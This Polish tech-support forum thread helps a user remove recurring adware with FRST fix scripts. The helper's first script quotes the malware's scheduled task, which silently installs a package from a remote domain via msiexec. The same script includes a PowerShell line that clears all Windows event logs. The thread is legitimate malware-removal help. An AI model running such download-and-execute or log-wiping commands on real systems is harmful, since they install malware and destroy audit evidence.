Witamy na forum PC Format Zapraszamy do REJESTRACJI


Użytkownicy przeglądający ten wątek: 1 gości

Wirus który wraca mimo że jest "usuwany"?

#1
Wirus który wraca mimo że jest "usuwany"?
Witam.
Ostatnio prześladuje mnie wirus, którego Avira oznacza jako typ: Adware.FileTour.(losowe znaki). Co jakąś godzine wywala mi na laptopie komunikat: Wystąpił problem podczas uruchamiania pliku MSE.Engine.dll. Zasoby systemowe nie wystarczają do ukończenia żądanej usługi. Avira ten plik automatycznie wrzuca do kwarantanny. Od czasu do czasu taki problem występuje w przypadku pliku IECache.dll. Za każdym razem gnieżdżą się w folderze C:\Users\Adrian\Favorites. Grzebałem po różnych wątkach na różnych forach i niestety, nic do tej pory mi nie pomogło. Pliki te od czasu do czasu ściągają mi trojany do tych folderów i mimo skanowania Avirą, Malwarebytesami różnymi, CCleanerami, JRT itd to problem cały czas u mnie jest i nie moge się pozbyć tego cholerstwa. Czy ktoś miał podobny problem i się go pozbył?
Proszę o pomoc,
Adrian
 System operacyjny: windows_ten Przeglądarka: chrome
#2
RE: Wirus który wraca mimo że jest "usuwany"?
czy nie prostsze byłoby pokazanie tu logów FRST?
 System operacyjny: windows_seven Przeglądarka: seamonkey
#3
RE: Wirus który wraca mimo że jest "usuwany"?
Oto i logi. Problem trwa dalej. Wirus jedynie przeniósł swój ulubiony folder do infekcji.


Załączone pliki
.txt   Shortcut.txt (Rozmiar: 38,15 KB / Pobrań: 14)
.txt   FRST.txt (Rozmiar: 29,35 KB / Pobrań: 14)
.txt   Addition.txt (Rozmiar: 83,84 KB / Pobrań: 14)
 System operacyjny: windows_ten Przeglądarka: chrome
#4
RE: Wirus który wraca mimo że jest "usuwany"?
Jest infekcja, która udaje, ze jest z ... Microsoftu!

Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Kod:
Task: {28F6CD07-AC62-4CEC-A0DE-23DE4028C07C} - System32\Tasks\{915AB88F-C783-6F5D-0481-6CC2A6AEA8B6} => "msiexec.exe" -package hxxps://siamoderg.info/zrgavluieegl.fur /q
Task: {DB9FD05D-1009-4D51-B918-CF3DB108451C} - \CCleanerSkipUAC -> No File <==== ATTENTION
C:\Windows\SysWOW64\dJAfEOuWIK.exe
C:\Program Files (x86)\nTIOXKAzadQ.exe
C:\Users\Adrian\AppData\Local\imw.ini
FirewallRules: [{848D3680-843D-47EB-8978-8C9392ABE65A}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
FirewallRules: [{0C941832-6B22-4B21-A2BF-E81551F0BCAA}] => (Allow) C:\Windows\SysWOW64\dJAfEOuWIK.exe
FirewallRules: [{002902D6-9D22-4A30-A58D-F2BCBEE02FF0}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E0D51B22-1115-41B8-B7C4-F8AAEBD98420}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E542AE5A-02B7-44BB-AE3E-1BDDF6EB21F1}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{8873B6E6-69A0-4B6E-AF91-E0C7AA085C91}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{64EE5AAA-8B0D-402B-9BEE-95C8C894E707}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{8301D19B-8E5E-4734-B8B3-D01AACD10F4C}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B56162AA-CAC0-4C60-8A36-6A2547583714}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{4B6B624E-314E-490B-9666-DC0ECDF3CF31}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{57CF3AB9-391B-4EF9-9820-6D3B4D51AC8E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{4F65BD88-2329-44DE-B561-009853B7EA9C}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{664BC0BE-BE6D-43C2-BABB-DD369918B5AB}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{22685FE3-CAC1-45C9-96DD-39F8F04CFC0F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{EBA7F64E-336B-42EC-939F-8A8A69E6D826}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{8C771290-912A-4C6F-8DAC-4D1267F3089E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{71C59722-D066-4714-8B31-130497F97A08}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{3EB5984B-899E-4383-BAD8-5C2A34FDBD90}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{C6DC8CF7-4AC3-4C79-8F80-D9B9D75AB688}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{33241446-4D35-4873-B3B8-8893BA35AB46}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E6DBCC5C-8415-40A8-B959-CF66CD854929}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{A3A171C5-3CD8-4DA8-8121-99530E5871D8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6DC60A76-0CCF-482D-BF30-565136E217FE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9AF71AD2-D5C2-4CC2-B626-B36C4D6860FA}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{95830E8E-FC1E-49D9-8FBB-1BF01F728883}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A902A3EE-91A3-4629-9C2A-ACE1E8DE3607}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{78EDE701-CFFD-4BFD-BBF8-D0A83697BD30}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{16415F38-A446-4198-9C82-ADF014FE69DE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0636E569-F191-450B-9CAA-997E8D40DFDD}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{3FD149B3-0643-47DA-9C2C-B7B7182B6BAE}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{AEDA38EB-17BD-435F-A090-A6A9C97C0B14}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{310633AE-9A30-4D23-ACE2-FBCF475B61D3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{1E92FDAD-65D8-4898-A5F7-D5CACA06EC62}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
CHR Extension: (MyJSCript) - C:\Users\Adrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpabpfikknflecblchhfkpkcpilbkfcd [2018-11-12]
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:
Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

Zrób nowe logi FRST.


Cytat:Za każdym razem gnieżdżą się w folderze C:\Users\Adrian\Favorites.
W logu Shortcut nie widzę niczego podejrzanego "Ulubionych" stronach (czyli w Favorites).
.
 System operacyjny: windows_seven Przeglądarka: seamonkey
#5
RE: Wirus który wraca mimo że jest "usuwany"?
Oto nowe logi. Zapewne nic tym razem w folderze Ulubionych nie pokazało, gdyż dnia dzisiejszego go czyściłem ręcznie. 


Załączone pliki
.txt   Addition.txt (Rozmiar: 69,39 KB / Pobrań: 14)
.txt   FRST.txt (Rozmiar: 37,34 KB / Pobrań: 14)
.txt   Shortcut.txt (Rozmiar: 38,15 KB / Pobrań: 14)
 System operacyjny: windows_ten Przeglądarka: chrome
#6
RE: Wirus który wraca mimo że jest "usuwany"?
Tylko kosmetyka:
Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Kod:
HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-67037204-977343973-1662228792-1001\...\Run: [] => [X]
GroupPolicy: Restriction ? <==== ATTENTION
CHR Extension: (MyJSCript) - C:\Users\Adrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpabpfikknflecblchhfkpkcpilbkfcd [2018-11-12]
EmptyTemp:
Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).
.
Powinno już być OK.
.
 System operacyjny: windows_seven Przeglądarka: seamonkey
#7
RE: Wirus który wraca mimo że jest "usuwany"?
Zrobiłem wszystko zgodnie z instrukcją. Od około 3 dni nie zauważyłem, by Avira alarmowała o wirusie...aż do dziś. Avira uznała, że FRST nosi w sobie trojana i wrzuciła FRST do kwarantanny. Przeczulenie antywirusa czy coś może być na rzeczy?
 System operacyjny: windows_ten Przeglądarka: chrome
#8
RE: Wirus który wraca mimo że jest "usuwany"?
to "przeczulenie".
 System operacyjny: windows_seven Przeglądarka: seamonkey
Programy: Polecane / Nowe / Inne




Podobne wątki (Wirus który wraca mimo że jest "usuwany"?)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Wirus który nie chce sie usunąć elderek 1 913 04.03.2017, 02:05
Ostatni post: broda99
  Mimo iż komputer działa normalnie wszycy odbiorcy maili mowią, że mam wirusa. niekumaty 1 2938 02.01.2016, 23:28
Ostatni post: morderca
  [Dysk twardy, pendrive]Wirus, który zamienia pliki na skróty. Polityk20122 9 4536 19.08.2014, 16:26
Ostatni post: Polityk20122

Skocz do:


Wybrane wątki (Wirus który wraca mimo że jest "usuwany"?)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Svchost Szwedu12 1 4353 19.01.2017 19:52
Ostatni post: broda99
Ściana Pliki .Ink jawa2m1 2 3764 19.01.2017 18:52
Ostatni post: jawa2m1
  eAgent BTC Sp. z o. o - jak to usunąć? niekumaty 5 2383 17.01.2017 15:08
Ostatni post: niekumaty
  Samoistne, niechciane otwieranie się stron w przeglądarkach. MIRZET 2 4167 15.01.2017 19:46
Ostatni post: MIRZET
  Komputer się zawiesza i wyłącza, Kernel Data Inpage Error magona 10 7982 12.01.2017 12:52
Ostatni post: magona
  Brak usługi kompozycje - Błąd 1075 __P3dv4nt3rPL__ 5 6775 12.01.2017 09:59
Ostatni post: morderca
  Wirus zamienił rozszerzenia dokumentów na .mp3 GrU5zk4 3 3834 12.01.2017 05:13
Ostatni post: morderca
  12kotov.ru startuje z windows abe2005 5 4493 12.01.2017 00:50
Ostatni post: morderca
  Zawirusowany misqu93 6 4522 11.01.2017 21:01
Ostatni post: morderca
  Samoistne otwieranie niechcianych stron makos1001 1 3954 03.01.2017 11:01
Ostatni post: broda99
  Wirus przegladarki - samoczynne wyskakujace okna, ktorych nie mozna zamknac adiq1033 13 10060 02.01.2017 14:08
Ostatni post: adiq1033
  adwcleaner się zawiesza MgrSzymek 1 4322 01.01.2017 16:12
Ostatni post: morderca
  CAPTCHA -jak wyłączyć/zablokowa baksiczek 1 5761 31.12.2016 22:24
Ostatni post: raxer
  Problem z chińskimi programami - Tencent pawel1409 9 4472 30.12.2016 18:57
Ostatni post: pawel1409
  Cofnięcie ustawień sieciowych na Windows7 walek7 0 691 28.12.2016 02:21
Ostatni post: walek7